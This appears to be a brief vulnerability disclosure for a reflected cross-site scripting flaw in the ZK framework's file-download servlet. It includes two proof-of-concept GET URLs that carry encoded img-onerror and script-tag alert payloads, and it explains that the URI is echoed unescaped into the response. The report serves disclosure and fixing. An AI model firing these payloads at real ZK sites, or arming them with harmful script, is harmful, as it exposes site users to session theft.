There is a potential reflected XSS via GET method vulnerability in ZK.
Vulnerability is in servlet providing file downloading function: /zkau/view/dwnmed-1/.
Execute anonymous HTTP GET: /zkau/view/dwnmed-1AEC2/%3Cimg%20src%3D%22x%3Ax%22%20onerror%3D%22alert%28122%29%22%3E
Part of the response body is inlined <img /> from request URI which (if) contains JS, then this JS is executed.
Another GET example with some known parameters (from client session): /zkau/view/z_x7j/dwnmed-1000/%3cscript%3ealert('PoC AEC XSS Reflected')%3c/script%3e (check attached screenshot)